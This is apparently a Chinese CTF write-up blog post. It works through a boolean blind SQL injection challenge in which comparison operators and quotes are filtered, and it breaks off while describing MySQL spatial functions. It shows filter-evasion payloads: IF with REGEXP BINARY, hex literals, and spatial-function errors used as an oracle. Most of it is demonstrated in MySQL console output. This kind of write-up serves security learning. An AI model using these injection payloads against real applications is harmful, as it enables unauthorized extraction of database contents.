<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.1.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">
  <meta name="google-site-verification" content="https://yoyo2yong.xyz">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"www.yoyo2tong.xyz","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="判断bool盲注测试?cat&#x3D;1和cat&#x3D;2，cat&#x3D;10000000返回的都是cat.png，输出1’ 返回none.png，说明存在SQL注入漏洞。 输入-1，空格，union，sleep等返回的是none.png，通过不断输入测试，判断当输入的内容不包含过滤时，返回cat.png。输入含有过滤的字符时，返回的是nono.png，当输入的sql查询语句有误且不包含过滤字符时，返回空白页面（状态">
<meta property="og:type" content="article">
<meta property="og:title" content="无判断字符，基于运行时错误的bool盲注">
<meta property="og:url" content="http://www.yoyo2tong.xyz/2021/01/30/cat/index.html">
<meta property="og:site_name" content="zoey">
<meta property="og:description" content="判断bool盲注测试?cat&#x3D;1和cat&#x3D;2，cat&#x3D;10000000返回的都是cat.png，输出1’ 返回none.png，说明存在SQL注入漏洞。 输入-1，空格，union，sleep等返回的是none.png，通过不断输入测试，判断当输入的内容不包含过滤时，返回cat.png。输入含有过滤的字符时，返回的是nono.png，当输入的sql查询语句有误且不包含过滤字符时，返回空白页面（状态">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/bool%E7%9B%B2%E6%B3%A8/2.png">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/bool%E7%9B%B2%E6%B3%A8/3.png">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/bool%E7%9B%B2%E6%B3%A8/4.png">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/bool%E7%9B%B2%E6%B3%A8/19.png">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/bool%E7%9B%B2%E6%B3%A8/7.png">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/bool%E7%9B%B2%E6%B3%A8/8.png">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/bool%E7%9B%B2%E6%B3%A8/10.png">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/bool%E7%9B%B2%E6%B3%A8/20.png">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/bool%E7%9B%B2%E6%B3%A8/13.png">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/bool%E7%9B%B2%E6%B3%A8/14.png">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/bool%E7%9B%B2%E6%B3%A8/22.png">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/bool%E7%9B%B2%E6%B3%A8/17.png">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/bool%E7%9B%B2%E6%B3%A8/18.png">
<meta property="og:image" content="https://zhuang-yongyi.gitee.io/yoyo/bool%E7%9B%B2%E6%B3%A8/21.png">
<meta property="article:published_time" content="2021-01-30T15:54:33.080Z">
<meta property="article:modified_time" content="2021-02-01T06:53:50.823Z">
<meta property="article:author" content="zoey">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://zhuang-yongyi.gitee.io/yoyo/bool%E7%9B%B2%E6%B3%A8/2.png">

<link rel="canonical" href="http://www.yoyo2tong.xyz/2021/01/30/cat/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>无判断字符，基于运行时错误的bool盲注 | zoey</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="zoey" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">zoey</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">请多指教！</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-sitemap">

    <a href="/sitemap.xml" rel="section"><i class="fa fa-sitemap fa-fw"></i>站点地图</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://www.yoyo2tong.xyz/2021/01/30/cat/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/1.jpg">
      <meta itemprop="name" content="zoey">
      <meta itemprop="description" content="Hello!">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="zoey">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          无判断字符，基于运行时错误的bool盲注
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-01-30 23:54:33" itemprop="dateCreated datePublished" datetime="2021-01-30T23:54:33+08:00">2021-01-30</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-02-01 14:53:50" itemprop="dateModified" datetime="2021-02-01T14:53:50+08:00">2021-02-01</time>
              </span>

          <br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>15k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>14 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="判断bool盲注"><a href="#判断bool盲注" class="headerlink" title="判断bool盲注"></a>判断bool盲注</h2><p>测试?cat=1和cat=2，cat=10000000返回的都是cat.png，输出1’ 返回none.png，说明存在SQL注入漏洞。</p>
<p>输入-1，空格，union，sleep等返回的是none.png，通过不断输入测试，判断当输入的内容不包含过滤时，返回cat.png。输入含有过滤的字符时，返回的是nono.png，当输入的sql查询语句有误且不包含过滤字符时，返回空白页面（状态码为500的错误）。由此可以判断是Boolean注入攻击。</p>
<p>过滤空格想到可以用%09代替，但是过滤union尝试用uniunionon，UNion，和unio\x6e都没有办法绕过。</p>
<p>接着的想法是利用bool盲注，发现&gt;,&lt;,=,like都被过滤，也就是说不能够通过这些来判断我们输入的语句是否正确。</p>
<p>接下来需要考虑的问题是如何可以避免使用&lt;,&gt;,=,like进行bool盲注。到这里就卡住了，没有什么想法，发现if函数没有被过滤，就查看mysql中if函数的用法。</p>
<h2 id="IF函数"><a href="#IF函数" class="headerlink" title="IF函数"></a>IF函数</h2><p>IF(expr1,expr2,expr3)，如果expr1的值为true，则返回expr2的值，如果expr1的值为false，则返回expr3的值。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select sex,name from student;</span><br><span class="line">+-----+-------+</span><br><span class="line">| sex | name  |</span><br><span class="line">+-----+-------+</span><br><span class="line">|   0 | name1 |</span><br><span class="line">|   1 | name2 |</span><br><span class="line">|   1 | name3 |</span><br><span class="line">|   0 | name4 |</span><br><span class="line">+-----+-------+</span><br><span class="line">4 rows in set</span><br><span class="line"></span><br><span class="line">mysql&gt; select name,if(sex&#x3D;0,&#39;女&#39;,&#39;男&#39;)as sex from student;</span><br><span class="line">+-------+-----+</span><br><span class="line">| name  | sex |</span><br><span class="line">+-------+-----+</span><br><span class="line">| name1 | 女  |</span><br><span class="line">| name2 | 男  |</span><br><span class="line">| name3 | 男  |</span><br><span class="line">| name4 | 女  |</span><br><span class="line">+-------+-----+</span><br><span class="line">4 rows in set</span><br><span class="line"></span><br><span class="line">mysql&gt; select name,if(0,&#39;女&#39;,&#39;男&#39;)as sex from student;</span><br><span class="line">+-------+-----+</span><br><span class="line">| name  | sex |</span><br><span class="line">+-------+-----+</span><br><span class="line">| name1 | 男  |</span><br><span class="line">| name2 | 男  |</span><br><span class="line">| name3 | 男  |</span><br><span class="line">| name4 | 男  |</span><br><span class="line">+-------+-----+</span><br><span class="line">4 rows in set</span><br><span class="line"></span><br><span class="line">mysql&gt; select sex,name from student;</span><br><span class="line">+-----+-------+</span><br><span class="line">| sex | name  |</span><br><span class="line">+-----+-------+</span><br><span class="line">|   0 | name1 |</span><br><span class="line">|   1 | name2 |</span><br><span class="line">|   1 | name3 |</span><br><span class="line">|   0 | name4 |</span><br><span class="line">+-----+-------+</span><br><span class="line">4 rows in set</span><br><span class="line"></span><br><span class="line">mysql&gt; select database();</span><br><span class="line">+------------+</span><br><span class="line">| database() |</span><br><span class="line">+------------+</span><br><span class="line">| oo         |</span><br><span class="line">+------------+</span><br><span class="line">1 row in set</span><br><span class="line"></span><br><span class="line">mysql&gt;  SELECT IF(length(database())&gt;8,1, 0)from student;</span><br><span class="line">+-------------------------------+</span><br><span class="line">| IF(length(database())&gt;8,1, 0) |</span><br><span class="line">+-------------------------------+</span><br><span class="line">|                             0 |</span><br><span class="line">|                             0 |</span><br><span class="line">|                             0 |</span><br><span class="line">|                             0 |</span><br><span class="line">+-------------------------------+</span><br><span class="line">4 rows in set</span><br><span class="line"></span><br><span class="line">mysql&gt;  SELECT IF(length(database())&gt;1,1, 0)from student;</span><br><span class="line">+-------------------------------+</span><br><span class="line">| IF(length(database())&gt;1,1, 0) |</span><br><span class="line">+-------------------------------+</span><br><span class="line">|                             1 |</span><br><span class="line">|                             1 |</span><br><span class="line">|                             1 |</span><br><span class="line">|                             1 |</span><br><span class="line">+-------------------------------+</span><br><span class="line">4 rows in set</span><br></pre></td></tr></table></figure>

<p>从这里例子我们知道，可以通过返回值的不同来判断bool盲注的结果，且盲注过程中if语句导致的查询结果的变化并不会导致数据库中的值发生变化，例如，在查询过程中我们把0变成女，把1变成男，但是在新的一个查询的，还是一样为0和1.</p>
<p>但是到这里还是不能避免使用&gt;,&lt;,=,like，通过阅读writeup，我们知道了regexp函数和binary函数</p>
<h2 id="regexp函数和binary函数"><a href="#regexp函数和binary函数" class="headerlink" title="regexp函数和binary函数"></a>regexp函数和binary函数</h2><p>regexp函数可以匹配正则表达式，而且regexp后面接的内容只要是前面mysql查询结果其中的一部分，就会返回1，否则返回0.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select flag from flag;</span><br><span class="line">+--------------------+</span><br><span class="line">| flag               |</span><br><span class="line">+--------------------+</span><br><span class="line">| flag&#123;flag is here&#125; |</span><br><span class="line">+--------------------+</span><br><span class="line">1 row in set (0.00 sec)</span><br><span class="line"></span><br><span class="line">mysql&gt; select (select flag from flag)regexp &#39;^flag&#123;f&#39;;</span><br><span class="line">+-----------------------------------------+</span><br><span class="line">| (select flag from flag)regexp &#39;^flag&#123;f&#39; |</span><br><span class="line">+-----------------------------------------+</span><br><span class="line">|                                       1 |</span><br><span class="line">+-----------------------------------------+</span><br><span class="line">1 row in set (0.00 sec)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">mysql&gt; select (select flag from flag)regexp &#39;lag&#39;;</span><br><span class="line">+-------------------------------------+</span><br><span class="line">| (select flag from flag)regexp &#39;lag&#39; |</span><br><span class="line">+-------------------------------------+</span><br><span class="line">|                                   1 |</span><br><span class="line">+-------------------------------------+</span><br><span class="line">1 row in set (0.00 sec)</span><br><span class="line"></span><br><span class="line">mysql&gt; select (select flag from flag)regexp &#39;&#123;&#39;;</span><br><span class="line">+-----------------------------------+</span><br><span class="line">| (select flag from flag)regexp &#39;&#123;&#39; |</span><br><span class="line">+-----------------------------------+</span><br><span class="line">|                                 1 |</span><br><span class="line">+-----------------------------------+</span><br><span class="line">1 row in set (0.00 sec)</span><br><span class="line"></span><br><span class="line">mysql&gt; select (select flag from flag)regexp &#39;lf&#39;;</span><br><span class="line">+------------------------------------+</span><br><span class="line">| (select flag from flag)regexp &#39;lf&#39; |</span><br><span class="line">+------------------------------------+</span><br><span class="line">|                                  0 |</span><br><span class="line">+------------------------------------+</span><br><span class="line">1 row in set</span><br></pre></td></tr></table></figure>

<p>binary函数将值转换成二进制字符串， SELECT BINARY “ABC”=”abc”，这里的MySQL执行的字符逐字符比较  “ABC”和  “abc”并返回0（因为在字符逐字符的基础上，它们是不等价的）</p>
<p> SELECT “ABC”=”abc”，这里的MySQL执行的字符逐字符比较  “ABC”和  “abc”并返回1（因为在字符逐字符的基础上，它们是等效的）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; SELECT BINARY &quot;123abc&quot;;</span><br><span class="line">+-----------------+</span><br><span class="line">| BINARY &quot;123abc&quot; |</span><br><span class="line">+-----------------+</span><br><span class="line">| 123abc          |</span><br><span class="line">+-----------------+</span><br><span class="line">1 row in set</span><br><span class="line"></span><br><span class="line">mysql&gt; SELECT BINARY &quot;ABC&quot;&#x3D;&quot;abc&quot;;</span><br><span class="line">+--------------------+</span><br><span class="line">| BINARY &quot;ABC&quot;&#x3D;&quot;abc&quot; |</span><br><span class="line">+--------------------+</span><br><span class="line">|                  0 |</span><br><span class="line">+--------------------+</span><br><span class="line">1 row in set</span><br><span class="line"></span><br><span class="line">mysql&gt; SELECT &quot;ABC&quot;&#x3D;&quot;abc&quot;;</span><br><span class="line">+-------------+</span><br><span class="line">| &quot;ABC&quot;&#x3D;&quot;abc&quot; |</span><br><span class="line">+-------------+</span><br><span class="line">|           1 |</span><br><span class="line">+-------------+</span><br><span class="line">1 row in set</span><br></pre></td></tr></table></figure>

<p>两个函数结合起来，跟regexp函数基本一样，但有些许不同，regexp后面接的是大写（查询结果是小写）也可以成功返回1，而regexp binary 不可以。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select flag from flag;</span><br><span class="line">+--------------+</span><br><span class="line">| flag         |</span><br><span class="line">+--------------+</span><br><span class="line">| flag is here |</span><br><span class="line">+--------------+</span><br><span class="line">1 row in set</span><br><span class="line"></span><br><span class="line">mysql&gt; select (select flag from flag)regexp binary 1;</span><br><span class="line">+----------------------------------------+</span><br><span class="line">| (select flag from flag)regexp binary 1 |</span><br><span class="line">+----------------------------------------+</span><br><span class="line">|                                      0 |</span><br><span class="line">+----------------------------------------+</span><br><span class="line">1 row in set</span><br><span class="line"></span><br><span class="line">mysql&gt; select (select flag from flag)regexp binary &#39; &#39;;</span><br><span class="line">+------------------------------------------+</span><br><span class="line">| (select flag from flag)regexp binary &#39; &#39; |</span><br><span class="line">+------------------------------------------+</span><br><span class="line">|                                        1 |</span><br><span class="line">+------------------------------------------+</span><br><span class="line">1 row in set</span><br><span class="line"></span><br><span class="line">mysql&gt; select (select flag from flag)regexp &#39;a&#39;;</span><br><span class="line">+-----------------------------------+</span><br><span class="line">| (select flag from flag)regexp &#39;a&#39; |</span><br><span class="line">+-----------------------------------+</span><br><span class="line">|                                 1 |</span><br><span class="line">+-----------------------------------+</span><br><span class="line">1 row in set</span><br><span class="line"></span><br><span class="line">mysql&gt; select (select flag from flag)regexp &#39;A&#39;;</span><br><span class="line">+-----------------------------------+</span><br><span class="line">| (select flag from flag)regexp &#39;A&#39; |</span><br><span class="line">+-----------------------------------+</span><br><span class="line">|                                 1 |</span><br><span class="line">+-----------------------------------+</span><br><span class="line">1 row in set</span><br><span class="line"></span><br><span class="line">mysql&gt; select (select flag from flag)regexp binary &#39;A&#39;;</span><br><span class="line">+------------------------------------------+</span><br><span class="line">| (select flag from flag)regexp binary &#39;A&#39; |</span><br><span class="line">+------------------------------------------+</span><br><span class="line">|                                        0 |</span><br><span class="line">+------------------------------------------+</span><br><span class="line">1 row in set</span><br><span class="line"></span><br><span class="line">mysql&gt; select (select flag from flag)regexp binary &#39;a&#39;;</span><br><span class="line">+------------------------------------------+</span><br><span class="line">| (select flag from flag)regexp binary &#39;a&#39; |</span><br><span class="line">+------------------------------------------+</span><br><span class="line">|                                        1 |</span><br><span class="line">+------------------------------------------+</span><br><span class="line">1 row in set</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="无判断字符mysql查询"><a href="#无判断字符mysql查询" class="headerlink" title="无判断字符mysql查询"></a>无判断字符mysql查询</h2><p>由此可知，我们可以利用regexp binary在不使用&gt;,&lt;,=,like的情况下，进行bool盲注。与前面没有被过滤的if语句结合起来，可以得到</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select if((select flag from flag)regexp binary &#39;flag is here&#39;,2,3);</span><br><span class="line">+-------------------------------------------------------------+</span><br><span class="line">| if((select flag from flag)regexp binary &#39;flag is here&#39;,2,3) |</span><br><span class="line">+-------------------------------------------------------------+</span><br><span class="line">|                                                           2 |</span><br><span class="line">+-------------------------------------------------------------+</span><br><span class="line">1 row in set</span><br><span class="line"></span><br><span class="line">mysql&gt;  select if((select flag from flag)regexp binary &#39;flag is &#39;,2,3);</span><br><span class="line">+---------------------------------------------------------+</span><br><span class="line">| if((select flag from flag)regexp binary &#39;flag is &#39;,2,3) |</span><br><span class="line">+---------------------------------------------------------+</span><br><span class="line">|                                                       2 |</span><br><span class="line">+---------------------------------------------------------+</span><br><span class="line">1 row in set</span><br><span class="line"></span><br><span class="line">mysql&gt; </span><br></pre></td></tr></table></figure>

<p>因为<code>&#39;</code>被过滤，所以binary后面不能带有<code>&#39;</code>,通过writeup发现把<code>&#39;</code>里面的字母换成16进制也可以成功执行。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select if((select flag from flag)regexp binary 0x20,2,3);</span><br><span class="line">+---------------------------------------------------+</span><br><span class="line">| if((select flag from flag)regexp binary 0x20,2,3) |</span><br><span class="line">+---------------------------------------------------+</span><br><span class="line">|                                                 2 |</span><br><span class="line">+---------------------------------------------------+</span><br><span class="line">1 row in set</span><br></pre></td></tr></table></figure>

<h2 id="bool盲注"><a href="#bool盲注" class="headerlink" title="bool盲注"></a>bool盲注</h2><p>到这里的想法就是通过返回的页面来判断是否输入正确，例如在mysql中的实验，输入正确时返回2，输入错误时返回3.但是在这道题中，只有三个返回页面，一个是输入cat.png，一个是nono.png，还有一个是返回空白页面（状态码为500）。如果我们还是使用<code>select if((select flag from flag)regexp binary 0x20,2,3);</code>来进行盲注，因为无论结果是2还是3都是返回正确的图片，因为返回错误图片是在输入含有被过滤的字符时，而不是在我们判断错误时返回（cat=0时返回的也是cat.png)，所有返回nono.png这张图片是我们利用不了的。现在的问题是我们要通过返回cat.png和返回空白页面来判断bool盲注。</p>
<p><img src="https://zhuang-yongyi.gitee.io/yoyo/bool%E7%9B%B2%E6%B3%A8/2.png" alt="2"></p>
<p><img src="https://zhuang-yongyi.gitee.io/yoyo/bool%E7%9B%B2%E6%B3%A8/3.png" alt="3"></p>
<p><img src="https://zhuang-yongyi.gitee.io/yoyo/bool%E7%9B%B2%E6%B3%A8/4.png" alt="4"></p>
<p>在这条sql查询语句中，select if((select flag from flag)regexp binary 0x20,expr2,expr3);我们需要返回cat.png的页面只需要让expr2或者expr3为数字即可。返回空白页面（状态码为500）有只有一种情况，当输入语句没有含有过滤字符且不能构成sql语句查询时。也就是说我们输入的查询语句在某些情况下可以构成正确的sql语句，在某些情况下会报错，不能构成正确的mysql查询语句。</p>
<p>继续看writeup，知道可以利用这些函数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">SELECT IF(&#123;&#125;, ST_X(ST_GeomFromText(&#39;POINT(mads)&#39;)), 0);</span><br><span class="line">SELECT IF(&#123;&#125;, ST_MPointFromText(&#39;MULTIPOINT (mads)&#39;),0);</span><br><span class="line">SELECT IF(&#123;&#125;, ST_X(MADS), 0);</span><br><span class="line">SELECT IF(&#123;&#125;, ST_MPointFromText(&#39;MADS&#39;),0);</span><br><span class="line">SELECT IF(&#123;&#125;, ST_GeomFromText(&#39;MADS&#39;),0);</span><br></pre></td></tr></table></figure>

<p>我们的目的就是sql注入mysql查询语句，在某些情况下该语句可以执行，在某些情况下该语句执行不了。</p>
<p>先查看这些函数的用法</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">ST_GeomFromText方法（根据字符串表示构造几何）</span><br><span class="line"></span><br><span class="line">语法：ST_GemoFromText（character-string,srid)</span><br><span class="line"></span><br><span class="line">character-string:包含几何文本表示的字符串，输入格式可以是任何支持的文本输入格式，包括标准文本（WKT)或扩展标准文本（EWKT）</span><br><span class="line"></span><br><span class="line">srid:类型，interger，默认为0</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">ST_X 以 ST_Point 作为输入参数，返回其 x 坐标。在 SQLite 中，ST_X 也可以更新 ST_Point 的 x 坐标。</span><br><span class="line"></span><br><span class="line">语法</span><br><span class="line">st_x (point1 geometryblob)</span><br><span class="line">st_x (input_point geometryblob, new_Xvalue double)</span><br><span class="line">ST_X 函数可用于 SQLite 更新点的 x 坐标。在这种情况下，将返回 geometryblob。</span><br></pre></td></tr></table></figure>

